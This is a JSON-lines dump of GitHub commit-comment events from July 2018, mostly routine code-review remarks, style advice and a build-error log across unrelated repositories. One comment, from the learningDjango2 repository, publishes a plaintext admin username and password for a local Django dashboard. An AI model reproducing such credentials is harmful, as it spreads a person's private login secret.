{"id":"8022633429","type":"CommitCommentEvent","actor":{"login":"leanderlee"},"repo":{"name":"diamondio/better-queue"},"payload":{"comment":{"id":29843711,"position":null,"line":null,"path":null,"commit_id":"9a06da924aac9c0f550765f3a9c80fede3813949","created_at":"2018-07-26T13:14:42Z","updated_at":"2018-07-26T13:14:42Z","author_association":"MEMBER","body":"oh. yes you are right... strange that it wasn’t set up properly."}},"created_at":"2018-07-26T13:14:42Z"}
{"id":"8022633573","type":"CommitCommentEvent","actor":{"login":"realemlakeskisehir"},"repo":{"name":"expresspixel/estatezilla"},"payload":{"comment":{"id":29843712,"position":null,"line":null,"path":null,"commit_id":"be270c92bab6f245dd5a9fda12291bf183be5920","created_at":"2018-07-26T13:14:44Z","updated_at":"2018-07-26T13:14:44Z","author_association":"NONE","body":"it is not working dont spend yur time and no help"}},"created_at":"2018-07-26T13:14:44Z"}
{"id":"8022633721","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"cindyker/CommandBook"},"payload":{"comment":{"id":29843713,"position":5,"line":35,"path":"src/main/java/com/sk89q/jinglenote/bukkit/BukkitJingleNotePlayer.java","commit_id":"6f2ba1a4591b424b5e4a25cf3f0bbfbd9bf214d6","created_at":"2018-07-26T13:14:45Z","updated_at":"2018-07-26T13:14:45Z","author_association":"NONE","body":"Jinglenote is in CraftBook by the way, and way more advanced. May be worth copying from there."}},"created_at":"2018-07-26T13:14:45Z"}
{"id":"8022644764","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29843733,"position":null,"line":null,"path":null,"commit_id":"7577b003fad4bea74f0fbc0acfb888703c214323","created_at":"2018-07-26T13:16:43Z","updated_at":"2018-07-26T13:16:43Z","author_association":"NONE","body":"Congrats again!"}},"created_at":"2018-07-26T13:16:43Z"}
{"id":"8022644962","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29843735,"position":28,"line":28,"path":"Lesson_2/amount_of_purchases.rb","commit_id":"5aa436bb6d2e02fc3ff59b2d932b2c9f0d59e54b","created_at":"2018-07-26T13:16:45Z","updated_at":"2018-07-26T13:16:45Z","author_association":"NONE","body":"здесь и далее везде:\r\nнайди для своего редактора автодобавление пустой строки в конце файла, чтобы не было красной стрелки на ГитХабе и вручную не приходилось добавлять строки в каждом файле"}},"created_at":"2018-07-26T13:16:45Z"}
{"id":"8022649059","type":"CommitCommentEvent","actor":{"login":"mbt522533623"},"repo":{"name":"mbt522533623/datepicker"},"payload":{"comment":{"id":29843745,"position":null,"line":null,"path":null,"commit_id":"2f71fd09157b8c59f0ceafa82c0871d2d9885513","created_at":"2018-07-26T13:17:26Z","updated_at":"2018-07-26T13:17:26Z","author_association":"OWNER","body":"<a href=\"https://www.baidu.com\">hello</a>"}},"created_at":"2018-07-26T13:17:26Z"}
{"id":"8022649482","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29843749,"position":null,"line":null,"path":null,"commit_id":"8d7f8f70bd8d399636100be99317c694e837f626","created_at":"2018-07-26T13:17:30Z","updated_at":"2018-07-26T13:17:30Z","author_association":"OWNER","body":"@cnuke: sorry, wrong commit"}},"created_at":"2018-07-26T13:17:30Z"}
{"id":"8022653601","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29843759,"position":null,"line":null,"path":null,"commit_id":"05735d5772c3da72ec371f056d1d4da04003de04","created_at":"2018-07-26T13:18:15Z","updated_at":"2018-07-26T13:18:15Z","author_association":"OWNER","body":"@cnuke: right commit, please add to your dde_linux_update branch"}},"created_at":"2018-07-26T13:18:15Z"}
{"id":"8022654646","type":"CommitCommentEvent","actor":{"login":"smacker"},"repo":{"name":"src-d/lookout"},"payload":{"comment":{"id":29843763,"position":21,"line":92,"path":"Makefile","commit_id":"d500a88eb8a117d52d020f1566ceb6f7c461e8b7","created_at":"2018-07-26T13:18:26Z","updated_at":"2018-07-26T13:18:26Z","author_association":"MEMBER","body":"nitpick: maybe `\\n` on a previous line?"}},"created_at":"2018-07-26T13:18:26Z"}
{"id":"8022656221","type":"CommitCommentEvent","actor":{"login":"YanaTux"},"repo":{"name":"YanaTux/Labs"},"payload":{"comment":{"id":29843767,"position":16,"line":16,"path":"LB1/LB1_1/Array.cs","commit_id":"52670d2d280399c10ccea0bdaa246d150583b65c","created_at":"2018-07-26T13:18:43Z","updated_at":"2018-07-26T13:18:43Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-26T13:18:43Z"}
{"id":"8022661352","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29843783,"position":7,"line":7,"path":"Lesson_2/array.rb","commit_id":"d5f019a18dfa2cd01a7b3d4b3126d68f7b737422","created_at":"2018-07-26T13:19:36Z","updated_at":"2018-07-26T13:19:36Z","author_association":"NONE","body":"хорошее и правильное решение, оставляй так\r\n\"для кругозора\" - еще можно вот так:\r\n```ruby\r\n(10..100).step(5).to_a\r\n```"}},"created_at":"2018-07-26T13:19:36Z"}
{"id":"8022662851","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29843788,"position":22,"line":29,"path":"elasticsearch_metrics/metric.py","commit_id":"0418fba408a9c9d12601d68f8d269366038ddd9d","created_at":"2018-07-26T13:19:52Z","updated_at":"2018-07-26T13:19:52Z","author_association":"OWNER","body":"Just thinking out load: I'm not sure users would expect their `String` fields to implicitly get these settings.\r\n\r\nPerhaps, instead of using dynamic_templates, we expose a custom field that automatically has these settings.\r\n\r\n```python\r\nfrom elasticsearch_metrics import Metric, NonAnalyzedString\r\n\r\nclass MyMetric(Metric):\r\n                        # naming TBD\r\n    thing_to_aggregate = NonAnalyzedString()\r\n```\r\n\r\nOn the other hand, the common use case for metrics is that strings will not be analyzed and use doc values, so maybe we optimize for that use case.\r\n\r\nNo action necessary for now--let's meet the 80% use case first."}},"created_at":"2018-07-26T13:19:52Z"}
{"id":"8022665276","type":"CommitCommentEvent","actor":{"login":"jeherve"},"repo":{"name":"Automattic/ghactivity"},"payload":{"comment":{"id":29843789,"position":null,"line":null,"path":null,"commit_id":"844ad92fa075a1805a8336a5a4ebb893c6748ecb","created_at":"2018-07-26T13:20:18Z","updated_at":"2018-07-26T13:20:18Z","author_association":"MEMBER","body":"What was your reasoning behind getting rid of WP_Query here?"}},"created_at":"2018-07-26T13:20:18Z"}
{"id":"8022668579","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29843799,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-26T13:20:54Z","updated_at":"2018-07-26T13:20:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T13:20:54Z"}
{"id":"8022670128","type":"CommitCommentEvent","actor":{"login":"desenvolvedorIcotrade"},"repo":{"name":"desenvolvedorIcotrade/WebServices"},"payload":{"comment":{"id":29843803,"position":null,"line":null,"path":null,"commit_id":"13c0185055ebc81e407ab00f87a5b6c0d4fb8ae8","created_at":"2018-07-26T13:21:10Z","updated_at":"2018-07-26T13:21:10Z","author_association":"OWNER","body":"<img border=\"0\" data-original-height=\"281\" data-original-width=\"281\" height=\"320\" src=\"https://1.bp.blogspot.com/-Hkc0p45h4OA/W1nKJiMqksI/AAAAAAAAElY/S8wcr0wqooYqxOdOag25HVyxKdP3laTxgCLcBGAs/s320/bloggif_5b59c773651dc.gif\" width=\"320\">"}},"created_at":"2018-07-26T13:21:10Z"}
{"id":"8022673142","type":"CommitCommentEvent","actor":{"login":"hexmode"},"repo":{"name":"MWStake/mediawiki-extensions-LDAPGroups"},"payload":{"comment":{"id":29843811,"position":null,"line":null,"path":null,"commit_id":"ec1e9eb78e378534c57cdca65a9a7d097cc66fa9","created_at":"2018-07-26T13:21:42Z","updated_at":"2018-07-26T13:21:42Z","author_association":"MEMBER","body":"Could you explain what error you are seeing that this fixes?\r\n\r\nThis contains an echo statement that needs to be removed."}},"created_at":"2018-07-26T13:21:42Z"}
{"id":"8022675067","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29843822,"position":19,"line":26,"path":"elasticsearch_metrics/metric.py","commit_id":"0418fba408a9c9d12601d68f8d269366038ddd9d","created_at":"2018-07-26T13:22:02Z","updated_at":"2018-07-26T13:22:02Z","author_association":"OWNER","body":"Black enforces [double-quotes strings](https://github.com/ambv/black#strings).\r\n\r\nBtw, it might be worth integrating black with your editor so you don't need to bother with this kind of thing: https://github.com/ambv/black#editor-integration"}},"created_at":"2018-07-26T13:22:02Z"}
{"id":"8022676521","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29843823,"position":null,"line":null,"path":null,"commit_id":"4588b2b263d654a22e1d3584ddc8aa8877591bb0","created_at":"2018-07-26T13:22:15Z","updated_at":"2018-07-26T13:22:15Z","author_association":"COLLABORATOR","body":"No problem. That's easy fix."}},"created_at":"2018-07-26T13:22:15Z"}
{"id":"8022680832","type":"CommitCommentEvent","actor":{"login":"brbrr"},"repo":{"name":"Automattic/ghactivity"},"payload":{"comment":{"id":29843832,"position":null,"line":null,"path":null,"commit_id":"844ad92fa075a1805a8336a5a4ebb893c6748ecb","created_at":"2018-07-26T13:23:00Z","updated_at":"2018-07-26T13:23:00Z","author_association":"COLLABORATOR","body":"That code throws `Allowed memory size exhausted` fatals from time to time. Looks like all these requests were cached, which cause buffer overflow (is that the correct name? :D)\r\n\r\ninternal-ref: p1532608193000045-slack-developers"}},"created_at":"2018-07-26T13:23:00Z"}
{"id":"8022682182","type":"CommitCommentEvent","actor":{"login":"Un1d3ntified"},"repo":{"name":"Cyb3rHacks/Snoopy-ng-2018-UPDATED-"},"payload":{"comment":{"id":29843835,"position":null,"line":null,"path":null,"commit_id":"1668b5d896c879e58564710ffcff9459206b7709","created_at":"2018-07-26T13:23:14Z","updated_at":"2018-07-26T13:23:14Z","author_association":"CONTRIBUTOR","body":"UPDATED KALI LINUX 2018.2"}},"created_at":"2018-07-26T13:23:14Z"}
{"id":"8022683785","type":"CommitCommentEvent","actor":{"login":"dhardy"},"repo":{"name":"rust-lang-nursery/rand"},"payload":{"comment":{"id":29843840,"position":null,"line":null,"path":null,"commit_id":"29cadd0899d64849ba62c4f806c3dadd8413e98c","created_at":"2018-07-26T13:23:29Z","updated_at":"2018-07-26T13:23:29Z","author_association":"COLLABORATOR","body":"If we need to re-implement the log macros either way, we should put the conditional logic inside:\r\n```rust\r\n#[allow(unused)]\r\nmacro_rules! trace { ($($x:tt)*) => (\r\n    #[cfg(feature = \"log\")] {\r\n        use log::trace as log_trace;\r\n        use log::log;\r\n        log_trace!($($x)*)\r\n    }\r\n) }\r\n```"}},"created_at":"2018-07-26T13:23:29Z"}
{"id":"8022684618","type":"CommitCommentEvent","actor":{"login":"Un1d3ntified"},"repo":{"name":"Cyb3rHacks/Snoopy-ng-2018-UPDATED-"},"payload":{"comment":{"id":29843846,"position":null,"line":null,"path":null,"commit_id":"3d36beb53a1c636f618f10cadea06e542e87d428","created_at":"2018-07-26T13:23:38Z","updated_at":"2018-07-26T13:23:38Z","author_association":"CONTRIBUTOR","body":"UPDATED KALI LINUX 2018.2"}},"created_at":"2018-07-26T13:23:38Z"}
{"id":"8022718615","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29843944,"position":13,"line":46,"path":"src/analyses/ai.h","commit_id":"574f29c7d0e1372dec405efe6c720ee337351052","created_at":"2018-07-26T13:29:30Z","updated_at":"2018-07-26T13:29:30Z","author_association":"OWNER","body":"? Will clang once done."}},"created_at":"2018-07-26T13:29:30Z"}
{"id":"8022720006","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29843948,"position":29,"line":251,"path":"src/analyses/ai.h","commit_id":"574f29c7d0e1372dec405efe6c720ee337351052","created_at":"2018-07-26T13:29:45Z","updated_at":"2018-07-26T13:29:45Z","author_association":"OWNER","body":"Point."}},"created_at":"2018-07-26T13:29:45Z"}
{"id":"8022727627","type":"CommitCommentEvent","actor":{"login":"pedramkat"},"repo":{"name":"pedramkat/treelle"},"payload":{"comment":{"id":29843960,"position":null,"line":null,"path":null,"commit_id":"eaf35bca2c47925831973467c8720bb283e5b04a","created_at":"2018-07-26T13:31:05Z","updated_at":"2018-07-26T13:31:05Z","author_association":"OWNER","body":"inizio progetto"}},"created_at":"2018-07-26T13:31:05Z"}
{"id":"8022733117","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29843968,"position":41,"line":47,"path":"elasticsearch_metrics/metric.py","commit_id":"0418fba408a9c9d12601d68f8d269366038ddd9d","created_at":"2018-07-26T13:32:00Z","updated_at":"2018-07-26T13:32:00Z","author_association":"OWNER","body":"Good catch-- we definitely don't want to use deprecated API."}},"created_at":"2018-07-26T13:32:00Z"}
{"id":"8022734480","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29843969,"position":6,"line":596,"path":"src/analyses/constant_propagator.cpp","commit_id":"7aca753693f1000e1009d311eb95100246241556","created_at":"2018-07-26T13:32:13Z","updated_at":"2018-07-26T13:32:13Z","author_association":"OWNER","body":"Will clang."}},"created_at":"2018-07-26T13:32:13Z"}
{"id":"8022736390","type":"CommitCommentEvent","actor":{"login":"AlexInntekt"},"repo":{"name":"AlexInntekt/learningDjango2"},"payload":{"comment":{"id":29843978,"position":null,"line":null,"path":null,"commit_id":"d0884af136b43cde0720c068fa9e04e4e3b7f819","created_at":"2018-07-26T13:32:32Z","updated_at":"2018-07-26T13:32:32Z","author_association":"OWNER","body":"You can access the dashboard at http://127.0.0.1:8000/admin/ using the following credentials:\r\nalexinntekt\r\nkeltari398"}},"created_at":"2018-07-26T13:32:32Z"}
{"id":"8022741898","type":"CommitCommentEvent","actor":{"login":"Groudonmaster"},"repo":{"name":"yogstation13/Yogstation-TG"},"payload":{"comment":{"id":29843991,"position":6,"line":245,"path":"code/modules/antagonists/traitor/IAA/internal_affairs.dm","commit_id":"d3b921c42addadd5e31abbb0b697b8c1896fc36c","created_at":"2018-07-26T13:33:28Z","updated_at":"2018-07-26T13:33:28Z","author_association":"NONE","body":"So you have should limit collateral damage"}},"created_at":"2018-07-26T13:33:28Z"}
{"id":"8022742120","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29843992,"position":5,"line":69,"path":"src/goto-analyzer/static_simplifier.cpp","commit_id":"7fde00be0f5616fe618c133ff3fb2eb777883549","created_at":"2018-07-26T13:33:30Z","updated_at":"2018-07-26T13:33:30Z","author_association":"OWNER","body":"Will do."}},"created_at":"2018-07-26T13:33:30Z"}
{"id":"8022744424","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29843994,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T13:33:54Z","updated_at":"2018-07-26T13:33:54Z","author_association":"OWNER","body":"А для чего мы создавали этот объект?\r\nЧтобы в него передавать значение из myPrintln()?"}},"created_at":"2018-07-26T13:33:54Z"}
{"id":"8022747620","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29844000,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T13:34:27Z","updated_at":"2018-07-26T13:34:27Z","author_association":"MEMBER","body":"Yes it does, thank you! I think we are ready for release, right..."}},"created_at":"2018-07-26T13:34:27Z"}
{"id":"8022749261","type":"CommitCommentEvent","actor":{"login":"Lisss13"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29844003,"position":6,"line":6,"path":"1/area_of_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-26T13:34:45Z","updated_at":"2018-07-26T13:34:45Z","author_association":"OWNER","body":"А есть какойто линт для ruby?\r\n"}},"created_at":"2018-07-26T13:34:45Z"}
{"id":"8022749596","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29844004,"position":16,"line":16,"path":"Lesson_2/fibonachi.rb","commit_id":"b6284c3efe9a13072f2628f1ac1ca5f52937c6f8","created_at":"2018-07-26T13:34:48Z","updated_at":"2018-07-26T13:34:48Z","author_association":"NONE","body":"ТЗ: \"Заполнить массив числами фибоначчи до 100\"\r\n\r\nя добавил последней строкой `p fibonchi` и запустил, вот что получилось:\r\n```\r\n$ ruby fibonachi.rb \r\n[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597, 2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025, 121393, 196418, 317811, 514229, 832040, 1346269, 2178309, 3524578, 5702887, 9227465, 14930352, 24157817, 39088169, 63245986, 102334155, 165580141, 267914296, 433494437, 701408733, 1134903170, 1836311903, 2971215073, 4807526976, 7778742049, 12586269025, 20365011074, 32951280099, 53316291173, 86267571272, 139583862445, 225851433717, 365435296162, 591286729879, 956722026041, 1548008755920, 2504730781961, 4052739537881, 6557470319842, 10610209857723, 17167680177565, 27777890035288, 44945570212853, 72723460248141, 117669030460994, 190392490709135, 308061521170129, 498454011879264, 806515533049393, 1304969544928657, 2111485077978050, 3416454622906707, 5527939700884757, 8944394323791464, 14472334024676221, 23416728348467685, 37889062373143906, 61305790721611591, 99194853094755497, 160500643816367088, 259695496911122585, 420196140727489673, 679891637638612258, 1100087778366101931, 1779979416004714189, 2880067194370816120, 4660046610375530309, 7540113804746346429, 12200160415121876738, 19740274219868223167, 31940434634990099905, 51680708854858323072, 83621143489848422977, 135301852344706746049, 218922995834555169026]\r\n```\r\n\r\nнемножко не до 100 получается )))))\r\nкакие-то квадрильоны повылазили ;)"}},"created_at":"2018-07-26T13:34:48Z"}
{"id":"8022751819","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/django-elasticsearch-metrics"},"payload":{"comment":{"id":29844008,"position":33,"line":39,"path":"elasticsearch_metrics/metric.py","commit_id":"0418fba408a9c9d12601d68f8d269366038ddd9d","created_at":"2018-07-26T13:35:11Z","updated_at":"2018-07-26T13:35:11Z","author_association":"OWNER","body":"Not sure if we should `refresh_interval` for users because it's a depedent on their applications needs (tradeoff between [consistency and indexing speed](https://sematext.com/blog/elasticsearch-refresh-interval-vs-indexing-performance/))."}},"created_at":"2018-07-26T13:35:11Z"}
{"id":"8022752054","type":"CommitCommentEvent","actor":{"login":"SWilke"},"repo":{"name":"as-ideas/as-ideas-website"},"payload":{"comment":{"id":29844009,"position":8,"line":7,"path":"public/blog/2018/07/disaster-recovery-day.md","commit_id":"5d352afc800edb1c57d590370c2159eca520fba4","created_at":"2018-07-26T13:35:13Z","updated_at":"2018-07-26T13:35:13Z","author_association":"NONE","body":"continuous"}},"created_at":"2018-07-26T13:35:13Z"}
{"id":"8022753272","type":"CommitCommentEvent","actor":{"login":"WalkerGriggs"},"repo":{"name":"WalkerGriggs/terraform"},"payload":{"comment":{"id":29844010,"position":30,"line":711,"path":"helper/schema/schema.go","commit_id":"56dbd275c98d16fd67535dad47c05408f1f96366","created_at":"2018-07-26T13:35:26Z","updated_at":"2018-07-26T13:35:26Z","author_association":"OWNER","body":"Previously Lists and Sets didn't have a default case. \r\n\r\nThis condition in the default case may not be necessary, but I included it until someone can confirm Lists and sets can't have elements other than type *Resource or *Schema"}},"created_at":"2018-07-26T13:35:26Z"}
{"id":"8022757125","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29844017,"position":42,"line":405,"path":"src/analyses/ai.cpp","commit_id":"9b2a98a82e36d014b66d5775e46c6bc7493114af","created_at":"2018-07-26T13:36:04Z","updated_at":"2018-07-26T13:36:04Z","author_association":"OWNER","body":"Fair.  This is stronger but is probably what the actual invariant is."}},"created_at":"2018-07-26T13:36:04Z"}
{"id":"8022757422","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29844018,"position":1,"line":1,"path":"Lesson_2/month_with_30days.rb","commit_id":"eeea7f6329c7a05997840ace9ac8c7e312ec625b","created_at":"2018-07-26T13:36:07Z","updated_at":"2018-07-26T13:36:07Z","author_association":"NONE","body":"для лучшей читаемости длинные хеши часто пишут вот так:\r\n```ruby\r\nhash = {\r\n  a: 1,\r\n  b: 2,\r\n  c: 3,\r\n  d: 4,\r\n  e: 5\r\n}\r\n```\r\n\r\nили вот так:\r\n\r\n```ruby\r\nhash = {\r\n  a: 1, b: 2, c: 3,\r\n  d: 4, e: 5\r\n}\r\n```\r\n\r\nдаже вот так:\r\n\r\n```ruby\r\nhash = { a: 1, b: 2, c: 3,\r\n         d: 4, e: 5 }\r\n```\r\n\r\nхотя последний вариант наименее предпочитаемый"}},"created_at":"2018-07-26T13:36:07Z"}
{"id":"8022757963","type":"CommitCommentEvent","actor":{"login":"wc-duck"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29844021,"position":null,"line":null,"path":null,"commit_id":"c192a6d1900b7cdcbf521b524548db11c4c25818","created_at":"2018-07-26T13:36:12Z","updated_at":"2018-07-26T13:36:12Z","author_association":"CONTRIBUTOR","body":"If you're fine with such a function I'll happily do the implementation."}},"created_at":"2018-07-26T13:36:12Z"}
{"id":"8022765674","type":"CommitCommentEvent","actor":{"login":"free-x"},"repo":{"name":"opengribs/XyGrib"},"payload":{"comment":{"id":29844031,"position":null,"line":null,"path":null,"commit_id":"fdd39bf28446cba4b7f8cc3a363ffda81cdaa830","created_at":"2018-07-26T13:37:26Z","updated_at":"2018-07-26T13:37:26Z","author_association":"CONTRIBUTOR","body":"Linux Build is broken with this commit\r\n```\r\n$ make\r\n/usr/bin/cmake -H/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib -B/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build --check-build-system CMakeFiles/Makefile.cmake 0\r\n/usr/bin/cmake -E cmake_progress_start /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build/CMakeFiles /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build/CMakeFiles/progress.marks\r\nmake -f CMakeFiles/Makefile2 all\r\nmake[1]: Entering directory '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build'\r\nmake -f src/CMakeFiles/XyGrib_automoc.dir/build.make src/CMakeFiles/XyGrib_automoc.dir/depend\r\nmake[2]: Entering directory '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build'\r\ncd /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build && /usr/bin/cmake -E cmake_depends \"Unix Makefiles\" /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/src /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build/src /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build/src/CMakeFiles/XyGrib_automoc.dir/DependInfo.cmake --color=\r\nScanning dependencies of target XyGrib_automoc\r\nmake[2]: Leaving directory '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build'\r\nmake -f src/CMakeFiles/XyGrib_automoc.dir/build.make src/CMakeFiles/XyGrib_automoc.dir/build\r\nmake[2]: Entering directory '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build'\r\n[  1%] Automatic moc and uic for target XyGrib\r\ncd /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build/src && /usr/bin/cmake -E cmake_autogen /home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build/src/CMakeFiles/XyGrib_automoc.dir/ \"\"\r\nGenerating moc source XyGrib_automoc.dir/moc_DateChooser_KZJXQBIBRSTTLL.cpp\r\nGenerating moc source XyGrib_automoc.dir/moc_MainWindow_AH7KPGTJ5NM6T5.cpp\r\nGenerating moc source XyGrib_automoc.dir/moc_MenuBar_ZAQ3E25UVPNBCS.cpp\r\nGenerating moc source XyGrib_automoc.dir/moc_Terrain_6FIDMQHHRAJWPU.cpp\r\nGenerating moc compilation XyGrib_automoc.cpp\r\nGenerating ui header ui_GraphicsParamsDialog.h\r\nFile '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/src/GraphicsParamsDialog.ui' is not valid\r\nAUTOUIC: error: process for ui_GraphicsParamsDialog.h needed by\r\n \"/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/src/DialogGraphicsParams.h\"\r\nfailed:\r\nFile '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/src/GraphicsParamsDialog.ui' is not valid\r\n\r\nuic failed...\r\nsrc/CMakeFiles/XyGrib_automoc.dir/build.make:60: recipe for target 'src/CMakeFiles/XyGrib_automoc' failed\r\nmake[2]: *** [src/CMakeFiles/XyGrib_automoc] Error 1\r\nmake[2]: Leaving directory '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build'\r\nCMakeFiles/Makefile2:141: recipe for target 'src/CMakeFiles/XyGrib_automoc.dir/all' failed\r\nmake[1]: *** [src/CMakeFiles/XyGrib_automoc.dir/all] Error 2\r\nmake[1]: Leaving directory '/home/oleg/segeln/OpenCPN-build/xygrib/XyGrib/build'\r\nMakefile:130: recipe for target 'all' failed\r\nmake: *** [all] Error 2\r\n```"}},"created_at":"2018-07-26T13:37:26Z"}
{"id":"8022766744","type":"CommitCommentEvent","actor":{"login":"rosston"},"repo":{"name":"testdouble/scripty"},"payload":{"comment":{"id":29844033,"position":null,"line":null,"path":null,"commit_id":"53a331af90945659ccb3ca7bfc2d989dba6aa3e2","created_at":"2018-07-26T13:37:36Z","updated_at":"2018-07-26T13:37:36Z","author_association":"NONE","body":"@texastoland Interestingly, the tests seem okay with both forms. However, I'd think that since `+` is one or more and `?` is zero or one, `+(|.*)` would be closer to `*(.*)`"}},"created_at":"2018-07-26T13:37:36Z"}
{"id":"8022766789","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng"},"payload":{"comment":{"id":29844034,"position":5,"line":244,"path":"src/dh.c","commit_id":"dce8e19f66824c6211e082437c581cf261379655","created_at":"2018-07-26T13:37:36Z","updated_at":"2018-07-26T13:37:36Z","author_association":"MEMBER","body":"why we need to expose this one for the toolkit?"}},"created_at":"2018-07-26T13:37:36Z"}
{"id":"8022768111","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29844037,"position":6,"line":6,"path":"Lesson_2/month_with_30days.rb","commit_id":"eeea7f6329c7a05997840ace9ac8c7e312ec625b","created_at":"2018-07-26T13:37:48Z","updated_at":"2018-07-26T13:37:48Z","author_association":"NONE","body":"здесь лучше использовать \"постфиксный иф\"\r\nуже написал про это в задачке про покупки, копирую:\r\n\r\nв руби не рекомендуют использовать `if / end` блоки без `else` ветви, если код умещается на одной строке\r\nдля такого случая предпочтение отдается \"постфиксной\" форме `if`\r\nдругими словами вместо\r\n```ruby {.line-numbers}\r\n    if a > b\r\n      do_something\r\n    end\r\n```\r\nрекомендуется писать\r\n```ruby {.line-numbers}\r\n    do_something if a > b\r\n```\r\n\r\nможно и нужно использовать префиксный if (до тела), если:\r\n- код, выполняемый по условию сложный (в несколько строк)\r\n- код занимает одну строку, но она длинаая"}},"created_at":"2018-07-26T13:37:48Z"}
{"id":"8022768502","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29844041,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T13:37:51Z","updated_at":"2018-07-26T13:37:51Z","author_association":"NONE","body":"Во-первых, никаких объектов в коде мы пока не создавали, во-вторых, ещё раз, метод myPrintln() не возвращает никаких значений.\r\nПереформулируй вопрос, какой момент тебе сейчас не понятен?"}},"created_at":"2018-07-26T13:37:51Z"}
